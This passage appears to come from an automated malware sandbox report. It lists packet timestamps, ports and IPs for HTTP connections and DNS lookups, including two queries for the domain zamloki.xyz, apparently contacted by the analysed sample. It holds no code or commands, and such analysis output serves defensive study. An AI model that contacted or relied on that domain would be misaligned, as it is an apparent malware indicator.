                                    Jul 21, 2021 17:03:07.053641081 CEST4987480192.168.2.3104.21.6.222
                                    Jul 21, 2021 17:03:07.073699951 CEST8049874104.21.6.222192.168.2.3
                                    Jul 21, 2021 17:03:07.241676092 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.260346889 CEST8049875172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:03:07.260454893 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.265630007 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.283443928 CEST8049875172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:03:07.283562899 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.301703930 CEST8049875172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:03:07.538237095 CEST8049875172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:03:07.538372040 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.538383007 CEST8049875172.67.155.45192.168.2.3
                                    Jul 21, 2021 17:03:07.538448095 CEST4987580192.168.2.3172.67.155.45
                                    Jul 21, 2021 17:03:07.557037115 CEST8049875172.67.155.45192.168.2.3

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 21, 2021 17:00:56.441010952 CEST5062053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:56.455663919 CEST53506208.8.8.8192.168.2.3
                                    Jul 21, 2021 17:00:57.080399990 CEST6493853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:57.095289946 CEST53649388.8.8.8192.168.2.3
                                    Jul 21, 2021 17:00:57.742415905 CEST6015253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:57.761401892 CEST53601528.8.8.8192.168.2.3
                                    Jul 21, 2021 17:00:57.875416994 CEST5754453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:57.895629883 CEST53575448.8.8.8192.168.2.3
                                    Jul 21, 2021 17:00:58.432408094 CEST5598453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:58.445481062 CEST53559848.8.8.8192.168.2.3
                                    Jul 21, 2021 17:00:59.044754028 CEST6418553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:00:59.057434082 CEST53641858.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:00.870955944 CEST6511053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:00.884851933 CEST53651108.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:03.939755917 CEST5836153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:03.953177929 CEST53583618.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:04.700114012 CEST6349253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:04.713082075 CEST53634928.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:05.348206997 CEST6083153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:05.361799002 CEST53608318.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:06.044063091 CEST6010053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:06.057650089 CEST53601008.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:06.924998999 CEST5319553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:06.938141108 CEST53531958.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:07.640341997 CEST5014153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:07.653251886 CEST53501418.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:08.317647934 CEST5302353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:08.331497908 CEST53530238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:08.986032009 CEST4956353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:08.999357939 CEST53495638.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:10.261662960 CEST5135253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:10.274313927 CEST53513528.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:10.884299994 CEST5934953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:10.897516966 CEST53593498.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:11.547935963 CEST5708453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:11.560789108 CEST53570848.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:12.222558975 CEST5882353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:12.235361099 CEST53588238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:31.581733942 CEST5756853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:31.610655069 CEST53575688.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:35.578704119 CEST5054053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:35.617165089 CEST53505408.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:47.772733927 CEST5436653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:47.820369959 CEST53543668.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:48.447290897 CEST5303453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:48.460391045 CEST53530348.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:48.889821053 CEST5776253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:48.918628931 CEST53577628.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:49.480160952 CEST5543553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:49.493999004 CEST53554358.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:50.053246021 CEST5071353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:50.080837011 CEST53507138.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:50.619071007 CEST5613253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:50.659485102 CEST53561328.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:51.244555950 CEST5898753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:51.259856939 CEST53589878.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:51.343739033 CEST5657953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:51.460205078 CEST53565798.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:51.822704077 CEST6063353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:51.840864897 CEST53606338.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:52.435712099 CEST6129253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:52.450843096 CEST53612928.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:52.944956064 CEST6361953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:52.959090948 CEST53636198.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:53.504734039 CEST6493853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:53.517739058 CEST53649388.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:54.058327913 CEST6194653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:54.071849108 CEST53619468.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:54.596539021 CEST6491053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:54.609664917 CEST53649108.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:54.990041971 CEST5212353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:55.017452002 CEST53521238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:55.133639097 CEST5613053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:55.147244930 CEST53561308.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:55.830039978 CEST5633853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:55.845146894 CEST53563388.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:56.351608992 CEST5942053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:56.364475012 CEST53594208.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:57.114506006 CEST5878453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:57.127418995 CEST53587848.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:58.566900015 CEST6397853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:58.579528093 CEST53639788.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:59.119703054 CEST6293853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:59.136631012 CEST53629388.8.8.8192.168.2.3
                                    Jul 21, 2021 17:01:59.720536947 CEST5570853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:01:59.734105110 CEST53557088.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:00.251041889 CEST5680353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:00.264766932 CEST53568038.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:00.995995998 CEST5714553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:01.011358976 CEST53571458.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:01.535348892 CEST5535953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:01.547601938 CEST53553598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:02.096215010 CEST5830653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:02.109075069 CEST53583068.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:02.683379889 CEST6412453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:02.697212934 CEST53641248.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:03.246648073 CEST4936153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:03.259548903 CEST53493618.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:04.097815037 CEST6315053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:04.110651016 CEST53631508.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:04.665661097 CEST5327953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:04.678721905 CEST53532798.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:05.191314936 CEST5688153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:05.204798937 CEST53568818.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:05.793621063 CEST5364253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:05.806677103 CEST53536428.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:05.985059023 CEST5566753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:05.998423100 CEST53556678.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:06.329431057 CEST5483353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:06.342366934 CEST53548338.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:06.854964018 CEST6247653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:06.867717981 CEST53624768.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:07.408443928 CEST4970553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:07.421330929 CEST53497058.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:07.953702927 CEST6147753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:07.966809034 CEST53614778.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:08.572448015 CEST6163353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:08.585386038 CEST53616338.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:09.141120911 CEST5594953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:09.154872894 CEST53559498.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:09.644927979 CEST5760153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:09.658538103 CEST53576018.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:10.208210945 CEST4934253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:10.222089052 CEST53493428.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:10.780577898 CEST5625353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:10.794037104 CEST53562538.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:11.029778004 CEST4966753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:11.047774076 CEST53496678.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:11.308162928 CEST5543953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:11.321959019 CEST53554398.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:11.884574890 CEST5706953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:11.897567987 CEST53570698.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:12.439172983 CEST5765953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:12.453144073 CEST53576598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:13.125791073 CEST5471753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:13.139075994 CEST53547178.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:13.677805901 CEST6397553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:13.691154003 CEST53639758.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:14.196557999 CEST5663953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:14.209321976 CEST53566398.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:14.789940119 CEST5185653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:14.803193092 CEST53518568.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:15.302637100 CEST5654653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:15.314749956 CEST53565468.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:15.851584911 CEST6215253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:15.864459991 CEST53621528.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:16.365945101 CEST5347053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:16.378748894 CEST53534708.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:16.930565119 CEST5644653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:16.943586111 CEST53564468.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:17.545233965 CEST5963153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:17.558372974 CEST53596318.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:18.076618910 CEST5551553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:18.089778900 CEST53555158.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:18.653898001 CEST6454753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:18.669893980 CEST53645478.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:19.171133995 CEST5175953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:19.184742928 CEST53517598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:19.683083057 CEST5920753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:19.696664095 CEST53592078.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:20.830728054 CEST5426953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:20.844033957 CEST53542698.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:21.655255079 CEST5485653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:21.668024063 CEST53548568.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:22.289550066 CEST6414053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:22.302670956 CEST53641408.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:22.831556082 CEST6227153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:22.845704079 CEST53622718.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:23.369633913 CEST5740453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:23.384310961 CEST53574048.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:23.885278940 CEST6299753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:23.899239063 CEST53629978.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:24.516382933 CEST5771253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:24.530240059 CEST53577128.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:25.049319983 CEST6006553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:25.063020945 CEST53600658.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:25.536776066 CEST5506853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:25.549998999 CEST53550688.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:26.029680967 CEST6470053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:26.041862965 CEST53647008.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:26.611677885 CEST6199853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:26.624532938 CEST53619988.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:27.105567932 CEST5372453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:27.118690968 CEST53537248.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:27.584485054 CEST5232853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:27.597445965 CEST53523288.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:28.098438978 CEST5805153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:28.111366034 CEST53580518.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:28.577903032 CEST6413053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:28.591471910 CEST53641308.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:29.084666967 CEST5049153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:29.097557068 CEST53504918.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:29.556833029 CEST5300453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:29.569693089 CEST53530048.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:30.181942940 CEST5252953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:30.195637941 CEST53525298.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:30.677241087 CEST5365653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:30.690920115 CEST53536568.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:31.316437006 CEST6272453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:31.329921961 CEST53627248.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:31.903207064 CEST5605953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:31.916907072 CEST53560598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:32.385659933 CEST6306053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:32.398425102 CEST53630608.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:32.845619917 CEST5149853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:32.859075069 CEST53514988.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:33.373795033 CEST5994353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:33.386698961 CEST53599438.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:33.836728096 CEST5011853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:33.849528074 CEST53501188.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:34.348006010 CEST5835753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:34.362941027 CEST53583578.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:34.871051073 CEST5580453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:34.884322882 CEST53558048.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:35.417689085 CEST5807953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:35.431210041 CEST53580798.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:35.918569088 CEST5208053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:35.932272911 CEST53520808.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:36.734096050 CEST5523853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:36.746150970 CEST53552388.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:37.226911068 CEST4928953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:37.240616083 CEST53492898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:37.833092928 CEST6103453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:37.845212936 CEST53610348.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:38.318547964 CEST5196453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:38.331445932 CEST53519648.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:38.808774948 CEST5824153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:38.821816921 CEST53582418.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:39.421036959 CEST5957153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:39.433140993 CEST53595718.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:39.926208973 CEST5170853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:39.939459085 CEST53517088.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:40.398852110 CEST6070953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:40.411689997 CEST53607098.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:40.924561024 CEST6364353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:40.937676907 CEST53636438.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:41.179389954 CEST6282353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:41.193344116 CEST53628238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:41.513676882 CEST6375053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:41.528363943 CEST53637508.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:42.003951073 CEST6195953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:42.016674042 CEST53619598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:42.496783972 CEST6355453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:42.508809090 CEST53635548.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:42.991158962 CEST5772353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:43.005970955 CEST53577238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:43.447094917 CEST5866353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:43.484456062 CEST53586638.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:43.504390001 CEST5098053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:43.516379118 CEST53509808.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:44.244338989 CEST5006753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:44.257256031 CEST53500678.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:44.874399900 CEST5299253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:44.887240887 CEST53529928.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:45.831178904 CEST5512953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:45.844196081 CEST53551298.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:47.472624063 CEST6095953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:47.487322092 CEST53609598.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:48.016567945 CEST5831953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:48.029633999 CEST53583198.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:48.573681116 CEST6478553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:48.586707115 CEST53647858.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:49.164589882 CEST5020853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:49.177376032 CEST53502088.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:49.767065048 CEST6247753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:49.780042887 CEST53624778.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:50.454210043 CEST5446753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:50.466878891 CEST53544678.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:51.105921030 CEST6054853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:51.118927002 CEST53605488.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:51.581773996 CEST5962353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:51.593761921 CEST53596238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:52.184186935 CEST5168953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:52.197248936 CEST53516898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:52.971012115 CEST6480653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:52.984622955 CEST53648068.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:53.458677053 CEST4968653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:53.471581936 CEST53496868.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:54.018378973 CEST5619553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:54.031950951 CEST53561958.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:54.546286106 CEST6224153192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:54.561252117 CEST53622418.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:55.047826052 CEST5054353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:55.061321020 CEST53505438.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:55.595923901 CEST5644553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:55.610295057 CEST53564458.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:56.135963917 CEST5670953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:56.148770094 CEST53567098.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:56.648803949 CEST5124853192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:56.662772894 CEST53512488.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:57.161147118 CEST4967953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:57.174108982 CEST53496798.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:57.656636953 CEST5026353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:57.670877934 CEST53502638.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:58.155379057 CEST4921553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:58.167531013 CEST53492158.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:58.721405983 CEST6437253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:58.735698938 CEST53643728.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:59.263781071 CEST5001653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:59.277935982 CEST53500168.8.8.8192.168.2.3
                                    Jul 21, 2021 17:02:59.845005989 CEST6132553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:02:59.860639095 CEST53613258.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:00.439763069 CEST4916053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:00.452721119 CEST53491608.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:00.962069035 CEST5126553192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:00.975579023 CEST53512658.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:01.614067078 CEST5200653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:01.626866102 CEST53520068.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:02.135927916 CEST5869753192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:02.148718119 CEST53586978.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:02.735625982 CEST5153053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:02.748351097 CEST53515308.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:03.275046110 CEST5098953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:03.287558079 CEST53509898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:03.922496080 CEST5332353192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:03.935904980 CEST53533238.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:04.469043970 CEST5903453192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:04.481213093 CEST53590348.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:05.002077103 CEST5310653192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:05.015263081 CEST53531068.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:05.525885105 CEST6213253192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:05.538188934 CEST53621328.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:06.172590971 CEST5448953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:06.184719086 CEST53544898.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:06.739574909 CEST6439053192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:06.752397060 CEST53643908.8.8.8192.168.2.3
                                    Jul 21, 2021 17:03:07.224699974 CEST5836953192.168.2.38.8.8.8
                                    Jul 21, 2021 17:03:07.238719940 CEST53583698.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jul 21, 2021 17:01:47.772733927 CEST192.168.2.38.8.8.80xfd7bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                    Jul 21, 2021 17:01:48.447290897 CEST192.168.2.38.8.8.80xd17bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
